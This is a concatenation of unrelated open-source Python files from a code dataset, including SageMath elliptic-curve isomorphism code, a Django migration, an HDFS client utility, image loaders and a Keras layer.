    # Generic case: candidate scalings u solve x^m = um, where m depends on
    # the automorphism group (j=0 -> m=6, j=1728 -> m=4, otherwise m=2).
    c4E,c6E = E.c_invariants()
    c4F,c6F = F.c_invariants()
    if j==0:
        m,um = 6,c6E/c6F
    elif j==1728:
        m,um=4,c4E/c4F
    else:
        m,um=2,(c6E*c4F)/(c6F*c4E)
    ulist=(x**m-um).roots(multiplicities=False)
    ans=[]
    for u in ulist:
        s = (a1F*u - a1E)/2
        r = (a2F*u**2 + a1E*s + s**2 - a2E)/3
        t = (a3F*u**3 - a1E*r - a3E)/2
        if JustOne: return (u,r,s,t)
        ans.append((u,r,s,t))
    if JustOne: return None
    ans.sort()
    return ans
class WeierstrassIsomorphism(baseWI,Morphism):
    r"""
    Class representing a Weierstrass isomorphism between two elliptic curves.
    """
    def __init__(self, E=None, urst=None, F=None):
        r"""
        Constructor for WeierstrassIsomorphism class,

        INPUT:

        - ``E`` -- an EllipticCurve, or None (see below).

        - ``urst`` -- a 4-tuple `(u,r,s,t)`, or None (see below).

        - ``F`` -- an EllipticCurve, or None (see below).

        Given two Elliptic Curves ``E`` and ``F`` (represented by
        Weierstrass models as usual), and a transformation ``urst``
        from ``E`` to ``F``, construct an isomorphism from ``E`` to
        ``F``.  An exception is raised if ``urst(E)!=F``.  At most one
        of ``E``, ``F``, ``urst`` can be None.  If ``F==None`` then
        ``F`` is constructed as ``urst(E)``.  If ``E==None`` then
        ``E`` is constructed as ``urst^-1(F)``.  If ``urst==None``
        then an isomorphism from ``E`` to ``F`` is constructed if
        possible, and an exception is raised if they are not
        isomorphic.  Otherwise ``urst`` can be a tuple of length 4 or
        a object of type ``baseWI``.

        Users will not usually need to use this class directly, but instead use
        methods such as ``isomorphism`` of elliptic curves.

        EXAMPLES::

            sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *
            sage: WeierstrassIsomorphism(EllipticCurve([0,1,2,3,4]),(-1,2,3,4))
            Generic morphism:
            From: Abelian group of points on Elliptic Curve defined by y^2 + 2*y = x^3 + x^2 + 3*x + 4 over Rational Field
            To:   Abelian group of points on Elliptic Curve defined by y^2 - 6*x*y - 10*y = x^3 - 2*x^2 - 11*x - 2 over Rational Field
            Via:  (u,r,s,t) = (-1, 2, 3, 4)
            sage: E=EllipticCurve([0,1,2,3,4])
            sage: F=EllipticCurve(E.cremona_label())
            sage: WeierstrassIsomorphism(E,None,F)
            Generic morphism:
            From: Abelian group of points on Elliptic Curve defined by y^2 + 2*y = x^3 + x^2 + 3*x + 4 over Rational Field
            To:   Abelian group of points on Elliptic Curve defined by y^2  = x^3 + x^2 + 3*x + 5 over Rational Field
            Via:  (u,r,s,t) = (1, 0, 0, -1)
            sage: w=WeierstrassIsomorphism(None,(1,0,0,-1),F)
            sage: w._domain_curve==E
            True
        """
        from ell_generic import is_EllipticCurve
        # Validate the arguments; at most one of E, urst, F may be None.
        if E!=None:
            if not is_EllipticCurve(E):
                raise ValueError("First argument must be an elliptic curve or None")
        if F!=None:
            if not is_EllipticCurve(F):
                raise ValueError("Third argument must be an elliptic curve or None")
        if urst!=None:
            if len(urst)!=4:
                raise ValueError("Second argument must be [u,r,s,t] or None")
        if len([par for par in [E,urst,F] if par!=None])<2:
            raise ValueError("At most 1 argument can be None")
        if F==None:  # easy case: compute F as urst(E)
            baseWI.__init__(self,*urst)
            F=EllipticCurve(baseWI.__call__(self,list(E.a_invariants())))
            Morphism.__init__(self, Hom(E(0).parent(), F(0).parent()))
            self._domain_curve = E
            self._codomain_curve = F
            return
        if E==None:  # easy case in reverse: compute E as urst^-1(F)
            baseWI.__init__(self,*urst)
            inv_urst=baseWI.__invert__(self)
            E=EllipticCurve(baseWI.__call__(inv_urst,list(F.a_invariants())))
            Morphism.__init__(self, Hom(E(0).parent(), F(0).parent()))
            self._domain_curve = E
            self._codomain_curve = F
            return
        if urst==None: # try to construct the morphism
            urst=isomorphisms(E,F,True)
            if urst==None:
                raise ValueError("Elliptic curves not isomorphic.")
            baseWI.__init__(self, *urst)
            Morphism.__init__(self, Hom(E(0).parent(), F(0).parent()))
            self._domain_curve = E
            self._codomain_curve = F
            return
        # none of the parameters is None: verify that urst maps E onto F.
        baseWI.__init__(self,*urst)
        if F!=EllipticCurve(baseWI.__call__(self,list(E.a_invariants()))):
            raise ValueError("second argument is not an isomorphism from first argument to third argument")
        else:
            Morphism.__init__(self, Hom(E(0).parent(), F(0).parent()))
            self._domain_curve = E
            self._codomain_curve = F
        return
    def __cmp__(self, other):
        r"""
        Standard comparison function for the WeierstrassIsomorphism class.

        EXAMPLE::

            sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *
            sage: E=EllipticCurve('389a1')
            sage: F=E.change_weierstrass_model(1,2,3,4)
            sage: w1=E.isomorphism_to(F)
            sage: w1==w1
            True
            sage: w2 = F.automorphisms()[0] *w1
            sage: w1==w2
            False

        ::

            sage: E=EllipticCurve_from_j(GF(7)(0))
            sage: F=E.change_weierstrass_model(2,3,4,5)
            sage: a=E.isomorphisms(F)
            sage: b=[w*a[0] for w in F.automorphisms()]
            sage: b.sort()
            sage: a==b
            True
            sage: c=[a[0]*w for w in E.automorphisms()]
            sage: c.sort()
            sage: a==c
            True
        """
        if not isinstance(other, WeierstrassIsomorphism):
            return cmp(type(self), type(other))
        # Compare domain, then codomain, then the (u,r,s,t) parameters.
        t = cmp(self._domain_curve, other._domain_curve)
        if t: return t
        t = cmp(self._codomain_curve, other._codomain_curve)
        if t: return t
        return baseWI.__cmp__(self,other)
    def __call__(self, P):
        r"""
        Call function for WeierstrassIsomorphism class.

        INPUT:

        - ``P`` (Point) -- a point on the domain curve.

        OUTPUT:

        (Point) the transformed point on the codomain curve.

        EXAMPLES::

            sage: from sage.schemes.elliptic_curves.weierstrass_morphism import *
            sage: E=EllipticCurve('37a1')
            sage: w=WeierstrassIsomorphism(E,(2,3,4,5))
            sage: P=E(0,-1)
            sage: w(P)
            (-3/4 : 3/4 : 1)
            sage: w(P).curve()==E.change_weierstrass_model((2,3,4,5))
            True
        """
        # The point at infinity (z==0) always maps to the point at infinity.
        if P[2] == 0:
            return self._codomain_curve(0)
        else:
            return self._codomain_curve.point(baseWI.__call__(self,tuple(P._coords)), check=False)
    def __invert__(self):
        r"""
        Returns the inverse of this WeierstrassIsomorphism.

        EXAMPLES::

            sage: E = EllipticCurve('5077')
            sage: F = E.change_weierstrass_model([2,3,4,5]); F
            Elliptic Curve defined by y^2 + 4*x*y + 11/8*y = x^3 - 7/4*x^2 - 3/2*x - 9/32 over Rational Field
            sage: w = E.isomorphism_to(F)
            sage: P = E(-2,3,1)
            sage: w(P)
            (-5/4 : 9/4 : 1)
            sage: ~w
            Generic morphism:
            From: Abelian group of points on Elliptic Curve defined by y^2 + 4*x*y + 11/8*y = x^3 - 7/4*x^2 - 3/2*x - 9/32 over Rational Field
            To:   Abelian group of points on Elliptic Curve defined by y^2 + y = x^3 - 7*x + 6 over Rational Field
            Via:  (u,r,s,t) = (1/2, -3/4, -2, 7/8)
            sage: Q = w(P); Q
            (-5/4 : 9/4 : 1)
            sage: (~w)(Q)
            (-2 : 3 : 1)
        """
        # Invert the (u,r,s,t) parameters and swap domain/codomain.
        winv=baseWI.__invert__(self).tuple()
        return WeierstrassIsomorphism(self._codomain_curve, winv, self._domain_curve)
    def __mul__(self,other):
        r"""
        Returns the composition of this WeierstrassIsomorphism and the other,

        WeierstrassMorphisms can be composed using ``*`` if the
        codomain & domain match: `(w1*w2)(X)=w1(w2(X))`, so we require
        ``w1.domain()==w2.codomain()``.

        EXAMPLES::

            sage: E1 = EllipticCurve('5077')
            sage: E2 = E1.change_weierstrass_model([2,3,4,5])
            sage: w1 = E1.isomorphism_to(E2)
            sage: E3 = E2.change_weierstrass_model([6,7,8,9])
            sage: w2 = E2.isomorphism_to(E3)
            sage: P = E1(-2,3,1)
            sage: (w2*w1)(P)==w2(w1(P))
            True
        """
        if self._domain_curve==other._codomain_curve:
            w=baseWI.__mul__(self,other)
            return WeierstrassIsomorphism(other._domain_curve, w.tuple(), self._codomain_curve)
        else:
            raise ValueError("Domain of first argument must equal codomain of second")
    def __repr__(self):
        r"""
        Returns the string representation of this WeierstrassIsomorphism.

        OUTPUT:

        (string) The underlying morphism, together with an extra line
        showing the `(u,r,s,t)` parameters.

        EXAMPLES::

            sage: E1 = EllipticCurve('5077')
            sage: E2 = E1.change_weierstrass_model([2,3,4,5])
            sage: E1.isomorphism_to(E2)
            Generic morphism:
            From: Abelian group of points on Elliptic Curve defined by y^2 + y = x^3 - 7*x + 6 over Rational Field
            To:   Abelian group of points on Elliptic Curve defined by y^2 + 4*x*y + 11/8*y = x^3 - 7/4*x^2 - 3/2*x - 9/32 over Rational Field
            Via:  (u,r,s,t) = (2, 3, 4, 5)
        """
        return Morphism.__repr__(self)+"\n Via: (u,r,s,t) = "+baseWI.__repr__(self)
| StarcoderdataPython |
3391101 | # Generated by Django 3.1.2 on 2020-11-04 01:45
from django.db import migrations
class Migration(migrations.Migration):
    # Renames the Chat model's 'sent' field to 'date' (schema-only change,
    # no data transformation).

    dependencies = [
        ('matchus', '0011_auto_20201104_0133'),
    ]
    operations = [
        migrations.RenameField(
            model_name='chat',
            old_name='sent',
            new_name='date',
        ),
    ]
| StarcoderdataPython |
3317086 | <reponame>yujmo/python<gh_stars>0
def gen():
    # Delegating generator: forwards next()/send()/throw() transparently to
    # subgen() via 'yield from'.
    yield from subgen()
def subgen():
    """Coroutine that alternately receives a value and yields that value + 1."""
    while True:
        received = yield
        yield received + 1
def main():
    """Drive gen(): prime it, send one value, print the incremented reply,
    then shut the generator down."""
    g = gen()
    next(g)
    retval = g.send(1)
    print(retval)
    # BUG FIX: throwing StopIteration into the delegating generator makes the
    # subgenerator (and hence gen) finish, so g.throw() re-raises
    # StopIteration to the caller and the script previously died with an
    # uncaught traceback. Catch it so the script terminates cleanly.
    try:
        g.throw(StopIteration)
    except StopIteration:
        pass

main()
| StarcoderdataPython |
4828578 | #generate an expander graph (into a CSV file for omnetpp template)
import matplotlib.pyplot as plt
import networkx as nx
import numpy as np
import os
path = r".\topologies\exp_CSV"
os.chdir(path)
n = 10 #Number of nodes
rep = 1 #number of files (always > 0)
save = False #to save the output as a SVG file
for graph_num in range(0,rep):
    # Adjacency map: node id -> list of neighbour ids ([-1] for isolated nodes).
    top = dict()
    network = nx.chordal_cycle_graph(n)
    edge = []
    # Collect edges, skipping self-loops and exact duplicates.
    # NOTE(review): only same-orientation duplicates are filtered; a reversed
    # duplicate (v,u) would pass this check -- confirm whether that can occur
    # with chordal_cycle_graph output.
    for(u,v,c) in network.edges.data():
        if(u,v) not in edge and u!=v:
            edge.append((u,v))
    for (u,v) in edge :
        if u in top:
            top[u].append(v)
        else:
            top[u] = []
            top[u].append(v)
    all_idx = np.arange(0,n,1)
    # Nodes with no recorded neighbours get a sentinel -1 entry.
    for idx in all_idx:
        if not idx in top:
            top[idx] = []
            top[idx].append(-1)
    top = dict(sorted(top.items()))
    # Write one CSV line per node: "node,neighbour,neighbour,...\n".
    # NOTE(review): 'neib == neibs[-1]' triggers the newline for ANY element
    # equal to the last one, so a duplicated neighbour value would split the
    # line early -- confirm neighbour lists are duplicate-free.
    with open('expander' + str(graph_num) + '.csv', 'w+') as csvfile:
        for site,neibs in top.items():
            csvfile.write(str(site) + ',')
            for neib in neibs:
                if neib == neibs[-1]:
                    csvfile.write(str(neib) + '\n')
                else:
                    csvfile.write(str(neib) + ',')
    if(save):
        fig = plt.figure(figsize=(40, 40))
        nx.draw(network)
        fig.savefig("exp" + str(graph_num) + ".svg")
102036 | """implements required text elements for the app"""
APP_NAME = "OSCAR"
WELCOME = "Welcome to " + APP_NAME
CREATE_PROJECT = {
'main': "Create ...",
'sub': "New " + APP_NAME + " project"
}
OPEN_PROJECT = {
'main': "Open ...",
'sub': "Existing " + APP_NAME + " project"
}
SECTIONS = {
'over': "Overview",
'energy': "Energy",
'water': "Water",
'food': "Food",
'busi': "Business"
}
| StarcoderdataPython |
3283595 | <reponame>rebryk/kaggle
from pathlib import Path
from typing import Union
import cv2
import numpy as np
def load_mask(path: Union[str, Path]) -> np.array:
    """Load a single-channel (grayscale) mask image from disk.

    :param path: path to a local file on disk
    :return: mask as a ``uint8`` NumPy array
    """
    raw = cv2.imread(str(path), cv2.IMREAD_GRAYSCALE)
    if raw is None:
        raise RuntimeError(f'Unable to load mask {str(path)}')
    return raw.astype(np.uint8)
def load_image(path: Union[str, Path]) -> np.array:
    """Load a three-channel image from disk, converted from BGR to RGB.

    :param path: path to a local file on disk
    :return: image as an RGB NumPy array
    """
    bgr = cv2.imread(str(path))
    if bgr is None:
        raise RuntimeError(f'Unable to load image {str(path)}')
    return cv2.cvtColor(bgr, cv2.COLOR_BGR2RGB)
| StarcoderdataPython |
1711077 | import math
# Compound-interest loop: read "deposit percent target" from stdin and print
# how many whole years it takes for the deposit to reach the target.
# (Cleanup: removed an unused 'input_numbers' list, dead commented-out code,
# and the redundant str->int two-step conversion.)
years = 0
init_deposit, percent, target = map(int, input().split())

deposit = init_deposit
while deposit < target:
    # Apply one year of interest, then round to whole cents.
    deposit += deposit * (percent / 100)
    years += 1
    deposit = float("{:.2f}".format(deposit))

print(years)
1618041 | <reponame>willthefrog/Paddle<filename>python/paddle/fluid/contrib/utils/hdfs_utils.py
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""HDFS Utils"""
import os
import sys
import subprocess
import multiprocessing
from datetime import datetime
import re
import copy
import errno
import logging
from paddle.fluid.log_helper import get_logger
__all__ = ["HDFSClient", "multi_download", "multi_upload"]
_logger = get_logger(
__name__, logging.INFO, fmt='%(asctime)s-%(levelname)s: %(message)s')
class HDFSClient(object):
"""
A tool of HDFS
Args:
hadoop_home (string): hadoop_home
configs (dict): hadoop config, it is a dict, please contain \
key "fs.default.name" and "hadoop.job.ugi"
Can be a float value
Examples:
hadoop_home = "/home/client/hadoop-client/hadoop/"
configs = {
"fs.default.name": "hdfs://xxx.hadoop.com:54310",
"hadoop.job.ugi": "hello,hello123"
}
client = HDFSClient(hadoop_home, configs)
client.ls("/user/com/train-25")
files = client.lsr("/user/com/train-25/models")
"""
def __init__(self, hadoop_home, configs):
self.pre_commands = []
hadoop_bin = '%s/bin/hadoop' % hadoop_home
self.pre_commands.append(hadoop_bin)
dfs = 'fs'
self.pre_commands.append(dfs)
for k, v in configs.iteritems():
config_command = '-D%s=%s' % (k, v)
self.pre_commands.append(config_command)
def __run_hdfs_cmd(self, commands, retry_times=5):
whole_commands = copy.deepcopy(self.pre_commands)
whole_commands.extend(commands)
print('Running system command: {0}'.format(' '.join(whole_commands)))
ret_code = 0
ret_out = None
ret_err = None
whole_commands = " ".join(whole_commands)
for x in range(retry_times + 1):
proc = subprocess.Popen(
whole_commands,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True)
(output, errors) = proc.communicate()
ret_code, ret_out, ret_err = proc.returncode, output, errors
if ret_code:
_logger.warn(
'Times: %d, Error running command: %s. Return code: %d, Error: %s'
% (x, ' '.join(whole_commands), proc.returncode, errors))
else:
break
return ret_code, ret_out, ret_err
    def upload(self, hdfs_path, local_path, overwrite=False, retry_times=5):
        """
        upload the local file to hdfs

        Args:
            hdfs_path(str): the hdfs directory to upload into
            local_path(str): the local file path (must exist; directories are
                not supported yet)
            overwrite(bool|None): will overwrite the file on HDFS or not
            retry_times(int|5): retry times

        Returns:
            True or False
        """
        # NOTE(review): asserts are stripped under python -O; consider raising
        # ValueError for argument validation instead.
        assert hdfs_path is not None
        assert local_path is not None and os.path.exists(local_path)
        if os.path.isdir(local_path):
            _logger.warn(
                "The Local path: {} is dir and I will support it later, return".
                format(local_path))
            return False
        base = os.path.basename(local_path)
        if not self.is_exist(hdfs_path):
            # makedirs is defined further down in this class (outside this view).
            self.makedirs(hdfs_path)
        else:
            if self.is_exist(os.path.join(hdfs_path, base)):
                if overwrite:
                    # NOTE(review): this deletes the whole hdfs_path directory,
                    # not just the existing file os.path.join(hdfs_path, base);
                    # after the delete, -put recreates hdfs_path as a file.
                    # Confirm whether that layout change is intended.
                    _logger.error(
                        "The HDFS path: {} is exist and overwrite is True, delete it".
                        format(hdfs_path))
                    self.delete(hdfs_path)
                else:
                    _logger.error(
                        "The HDFS path: {} is exist and overwrite is False, return".
                        format(hdfs_path))
                    return False
        put_commands = ["-put", local_path, hdfs_path]
        returncode, output, errors = self.__run_hdfs_cmd(put_commands,
                                                         retry_times)
        if returncode:
            _logger.error("Put local path: {} to HDFS path: {} failed".format(
                local_path, hdfs_path))
            return False
        else:
            _logger.info("Put local path: {} to HDFS path: {} successfully".
                         format(local_path, hdfs_path))
            return True
def download(self, hdfs_path, local_path, overwrite=False, unzip=False):
"""
download file from HDFS
Args:
hdfs_path(str): the hdfs file path
local_path(str): the local file path
overwrite(bool|None): will overwrite the file on HDFS or not
unzip(bool|False): if the download file is compressed by zip, unzip it or not.
Returns:
True or False
"""
_logger.info('Downloading %r to %r.', hdfs_path, local_path)
_logger.info('Download of %s to %r complete.', hdfs_path, local_path)
if not self.is_exist(hdfs_path):
print("HDFS path: {} do not exist".format(hdfs_path))
return False
if self.is_dir(hdfs_path):
_logger.error(
"The HDFS path: {} is dir and I will support it later, return".
format(hdfs_path))
if os.path.exists(local_path):
base = os.path.basename(hdfs_path)
local_file = os.path.join(local_path, base)
if os.path.exists(local_file):
if overwrite:
os.remove(local_file)
else:
_logger.error(
"The Local path: {} is exist and overwrite is False, return".
format(local_file))
return False
self.make_local_dirs(local_path)
download_commands = ["-get", hdfs_path, local_path]
returncode, output, errors = self.__run_hdfs_cmd(download_commands)
if returncode:
_logger.error("Get local path: {} from HDFS path: {} failed".format(
local_path, hdfs_path))
return False
else:
_logger.info("Get local path: {} from HDFS path: {} successfully".
format(local_path, hdfs_path))
return True
def is_exist(self, hdfs_path=None):
"""
whether the remote HDFS path exists
Args:
hdfs_path(str): the hdfs file path
Returns:
True or False
"""
exist_cmd = ['-test', '-e', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(
exist_cmd, retry_times=1)
if returncode:
_logger.error("HDFS is_exist HDFS path: {} failed".format(
hdfs_path))
return False
else:
_logger.info("HDFS is_exist HDFS path: {} successfully".format(
hdfs_path))
return True
def is_dir(self, hdfs_path=None):
"""
whether the remote HDFS path is directory
Args:
hdfs_path(str): the hdfs file path
Returns:
True or False
"""
if not self.is_exist(hdfs_path):
return False
dir_cmd = ['-test', '-d', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(dir_cmd, retry_times=1)
if returncode:
_logger.error("HDFS path: {} failed is not a directory".format(
hdfs_path))
return False
else:
_logger.info("HDFS path: {} successfully is a directory".format(
hdfs_path))
return True
def delete(self, hdfs_path):
"""
Remove a file or directory from HDFS.
whether the remote HDFS path exists
Args:
hdfs_path: HDFS path.
Returns:
True or False
This function returns `True` if the deletion was successful and `False` if
no file or directory previously existed at `hdfs_path`.
"""
_logger.info('Deleting %r.', hdfs_path)
if not self.is_exist(hdfs_path):
_logger.warn("HDFS path: {} do not exist".format(hdfs_path))
return True
if self.is_dir(hdfs_path):
del_cmd = ['-rmr', hdfs_path]
else:
del_cmd = ['-rm', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(del_cmd, retry_times=0)
if returncode:
_logger.error("HDFS path: {} delete files failure".format(
hdfs_path))
return False
else:
_logger.info("HDFS path: {} delete files successfully".format(
hdfs_path))
return True
def rename(self, hdfs_src_path, hdfs_dst_path, overwrite=False):
"""
Move a file or folder on HDFS.
Args:
hdfs_path(str): HDFS path.
overwrite(bool|False): If the path already exists and overwrite is False, will return False.
Returns:
True or False
"""
assert hdfs_src_path is not None
assert hdfs_dst_path is not None
if not self.is_exist(hdfs_src_path):
_logger.info("HDFS path do not exist: {}".format(hdfs_src_path))
if self.is_exist(hdfs_dst_path) and not overwrite:
_logger.error("HDFS path is exist: {} and overwrite=False".format(
hdfs_dst_path))
rename_command = ['-mv', hdfs_src_path, hdfs_dst_path]
returncode, output, errors = self.__run_hdfs_cmd(
rename_command, retry_times=1)
if returncode:
_logger.error("HDFS rename path: {} to {} failed".format(
hdfs_src_path, hdfs_dst_path))
return False
else:
_logger.info("HDFS rename path: {} to {} successfully".format(
hdfs_src_path, hdfs_dst_path))
return True
@staticmethod
def make_local_dirs(local_path):
"""
create a directiory local, is same to mkdir
Args:
local_path: local path that wants to create a directiory.
"""
try:
os.makedirs(local_path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def makedirs(self, hdfs_path):
"""
Create a remote directory, recursively if necessary.
Args:
hdfs_path(str): Remote path. Intermediate directories will be created appropriately.
Returns:
True or False
"""
_logger.info('Creating directories to %r.', hdfs_path)
assert hdfs_path is not None
if self.is_exist(hdfs_path):
_logger.error("HDFS path is exist: {}".format(hdfs_path))
return
mkdirs_commands = ['-mkdir', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(
mkdirs_commands, retry_times=1)
if returncode:
_logger.error("HDFS mkdir path: {} failed".format(hdfs_path))
return False
else:
_logger.error("HDFS mkdir path: {} successfully".format(hdfs_path))
return True
def ls(self, hdfs_path):
"""
ls directory contents about HDFS hdfs_path
Args:
hdfs_path(str): Remote HDFS path will be ls.
Returns:
List: a contents list about hdfs_path.
"""
assert hdfs_path is not None
if not self.is_exist(hdfs_path):
return []
ls_commands = ['-ls', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(
ls_commands, retry_times=1)
if returncode:
_logger.error("HDFS list path: {} failed".format(hdfs_path))
return []
else:
_logger.info("HDFS list path: {} successfully".format(hdfs_path))
ret_lines = []
regex = re.compile('\s+')
out_lines = output.strip().split("\n")
for line in out_lines:
re_line = regex.split(line)
if len(re_line) == 8:
ret_lines.append(re_line[7])
return ret_lines
def lsr(self, hdfs_path, only_file=True, sort=True):
"""
list directory contents about HDFS hdfs_path recursively
Args:
hdfs_path(str): Remote HDFS path.
only_file(bool|True): will discard folders.
sort(bool|True): will be sorted by create time.
Returns:
List: a contents list about hdfs_path.
"""
def sort_by_time(v1, v2):
v1_time = datetime.strptime(v1[1], '%Y-%m-%d %H:%M')
v2_time = datetime.strptime(v2[1], '%Y-%m-%d %H:%M')
return v1_time > v2_time
assert hdfs_path is not None
if not self.is_exist(hdfs_path):
return []
ls_commands = ['-lsr', hdfs_path]
returncode, output, errors = self.__run_hdfs_cmd(
ls_commands, retry_times=1)
if returncode:
_logger.error("HDFS list all files: {} failed".format(hdfs_path))
return []
else:
_logger.info("HDFS list all files: {} successfully".format(
hdfs_path))
lines = []
regex = re.compile('\s+')
out_lines = output.strip().split("\n")
for line in out_lines:
re_line = regex.split(line)
if len(re_line) == 8:
if only_file and re_line[0][0] == "d":
continue
else:
lines.append(
(re_line[7], re_line[5] + " " + re_line[6]))
if sort:
sorted(lines, cmp=sort_by_time)
ret_lines = [ret[0] for ret in lines]
return ret_lines
def multi_download(client,
                   hdfs_path,
                   local_path,
                   trainer_id,
                   trainers,
                   multi_processes=5):
    """
    Download files from HDFS using multiple worker processes.

    Args:
        client(HDFSClient): instance of HDFSClient
        hdfs_path(str): path on hdfs
        local_path(str): path on local
        trainer_id(int): current trainer id
        trainers(int): all trainers number
        multi_processes(int|5): the download data process at the same time, default=5
    Returns:
        List: the local paths of the files this trainer downloaded.
    """

    def __worker(remote_files):
        # Mirror each remote file into local_path, preserving the directory
        # layout relative to hdfs_path.
        for remote in remote_files:
            rel_dir = os.path.relpath(os.path.dirname(remote), hdfs_path)
            if rel_dir == os.curdir:
                target_dir = local_path
            else:
                target_dir = os.path.join(local_path, rel_dir)
            client.download(remote, target_dir)

    assert isinstance(client, HDFSClient)
    client.make_local_dirs(local_path)
    _logger.info("Make local dir {} successfully".format(local_path))
    all_need_download = client.lsr(hdfs_path, sort=True)
    # Shard the file list across trainers so each gets a disjoint slice.
    need_download = all_need_download[trainer_id::trainers]
    _logger.info("Get {} files From all {} files need to be download from {}".
                 format(len(need_download), len(all_need_download), hdfs_path))
    _logger.info("Start {} multi process to download datas".format(
        multi_processes))
    procs = []
    for worker_id in range(multi_processes):
        proc = multiprocessing.Process(
            target=__worker,
            args=(need_download[worker_id::multi_processes], ))
        procs.append(proc)
        proc.start()
    # Wait for every worker to finish.
    for proc in procs:
        proc.join()
    _logger.info("Finish {} multi process to download datas".format(
        multi_processes))

    def __local_target(remote):
        # Compute where __worker placed this remote file locally.
        rel_dir = os.path.relpath(os.path.dirname(remote), hdfs_path)
        name = os.path.basename(remote)
        if rel_dir == os.curdir:
            return os.path.join(local_path, name)
        return os.path.join(local_path, rel_dir, name)

    return [__local_target(remote) for remote in need_download]
def getfilelist(path):
    """Walk ``path`` recursively and print every file found.

    Args:
        path: root directory to walk.
    """
    # Renamed loop variables: the original shadowed the builtins
    # ``dir`` and ``file``.
    found = []
    for dirpath, _dirnames, filenames in os.walk(path):
        for filename in filenames:
            found.append(os.path.join(dirpath, filename))
    for entry in found:
        print(entry)
def multi_upload(client,
                 hdfs_path,
                 local_path,
                 multi_processes=5,
                 overwrite=False,
                 sync=True):
    """
    Upload files to HDFS using multiple worker processes.

    Args:
        client(HDFSClient): instance of HDFSClient
        hdfs_path(str): path on hdfs
        local_path(str): path on local
        multi_processes(int|5): the upload data process at the same time, default=5
        overwrite(bool|False): will overwrite file on HDFS or not
        sync(bool|True): upload files sync or not.
    Returns:
        None
    """

    def __worker(local_files):
        # Mirror each local file into the matching directory under hdfs_path.
        for local_file in local_files:
            rel_dir = os.path.relpath(os.path.dirname(local_file), local_path)
            client.upload(
                os.path.join(hdfs_path, rel_dir),
                local_file,
                overwrite,
                retry_times=5)

    def __collect_files(root):
        # Gather every regular file below ``root``; empty when root is
        # missing or not a directory.
        if not os.path.isdir(root):
            return []
        return [
            os.path.join(dirpath, name)
            for dirpath, _dirnames, filenames in os.walk(root)
            for name in filenames
        ]

    assert isinstance(client, HDFSClient)
    all_files = __collect_files(local_path)
    if not all_files:
        _logger.info("there are nothing need to upload, exit")
        return
    _logger.info("Start {} multi process to upload datas".format(
        multi_processes))
    procs = []
    for worker_id in range(multi_processes):
        proc = multiprocessing.Process(
            target=__worker, args=(all_files[worker_id::multi_processes], ))
        procs.append(proc)
        proc.start()
    # Wait for every worker to finish.
    for proc in procs:
        proc.join()
    _logger.info("Finish {} multi process to upload datas".format(
        multi_processes))
if __name__ == "__main__":
    # Demo wiring against a (placeholder) Hadoop cluster.
    hadoop_home = "/home/client/hadoop-client/hadoop/"
    configs = {
        "fs.default.name": "hdfs://xxx.hadoop.com:54310",
        "hadoop.job.ugi": "hello,hello123"
    }
    client = HDFSClient(hadoop_home, configs)
    client.ls("/user/com/train-25")
    files = client.lsr("/user/com/train-25/models")
    # The old call passed a stray positional ``100`` that bound to
    # ``multi_processes`` and then clashed with the keyword argument,
    # raising TypeError: got multiple values for 'multi_processes'.
    downloads = multi_download(
        client,
        "/user/com/train-25/model",
        "/home/xx/data1",
        1,  # trainer_id
        5,  # trainers
        multi_processes=5)
    multi_upload(client, "/user/com/train-25/model", "/home/xx/data1")
| StarcoderdataPython |
4801516 | #does not work
import numpy as np
import math
from tensorflow.keras import backend as K
from tensorflow.keras.layers import Layer,Dense, Activation
import tensorflow.keras as keras# as k
import tensorflow as t
from tensorflow.keras.models import Sequential
from tensorflow.keras.optimizers import Adam,SGD
from tensorflow.linalg import trace
class gcomdex(Layer):
    """Keras layer that orders a group's items by their last feature.

    For input of shape (batch, gs, param) it returns, per batch row, the
    indices of the ``gs`` items sorted descending by the value in the last
    feature column (a full argsort obtained via ``top_k``), cast to float32.
    """

    def __init__(self, gs=20, param=40, **kwargs):
        # gs: group size (items per sample); param: features per item.
        self.gs = gs
        self.param = param
        super(gcomdex, self).__init__(**kwargs)

    def build(self, input_shape):
        # No trainable weights.
        self.built = True

    def call(self, x):
        # NOTE(review): the layer expects a list/tuple of inputs and uses
        # only the first tensor -- confirm against callers.
        x = x[0]
        values = x[:, :, -1]
        # top_k with k == gs yields a full descending argsort per row.
        _, valueorder = t.math.top_k(values, k=self.gs)
        valueorder = K.cast(valueorder, "float32")
        return valueorder

    def compute_output_shape(self, input_shape):
        input_shape = input_shape[0]
        assert len(input_shape) == 3
        assert input_shape[1] == self.gs
        assert input_shape[2] == self.param
        return tuple([input_shape[0], self.gs])

    def get_config(self):
        mi = {"gs": self.gs, "param": self.param}
        th = super(gcomdex, self).get_config()
        th.update(mi)
        return th

    @staticmethod
    def from_config(config):
        # Without a decorator this was an instance method missing ``self``,
        # so ``layer.from_config(cfg)`` raised TypeError. @staticmethod keeps
        # ``gcomdex.from_config(cfg)`` working and fixes the instance case.
        return gcomdex(**config)
| StarcoderdataPython |
3333979 | from pmaf.pipe.specs._metakit import SpecificationCompositeMetabase,SpecificationBackboneMetabase
from pmaf.pipe.specs._base import SpecificationBase
class SpecificationCompositeBase(SpecificationBase,SpecificationCompositeMetabase):
    """Composite specification built from an ordered sequence of specs."""
    def __init__(self, _specs, _steps):
        # Every member must implement the backbone specification interface.
        for spec in _specs:
            if not isinstance(spec, SpecificationBackboneMetabase):
                raise TypeError('`_specs` contain element with invalid type.')
        unique_factors = {spec.factor for spec in _specs}
        if len(unique_factors) != 1:
            raise RuntimeError('Composite specification may contain only one factor.')
        self.__specs = _specs
        self.__factor = unique_factors.pop()
        self.__steps = _steps
    def verify_docker(self, docker):
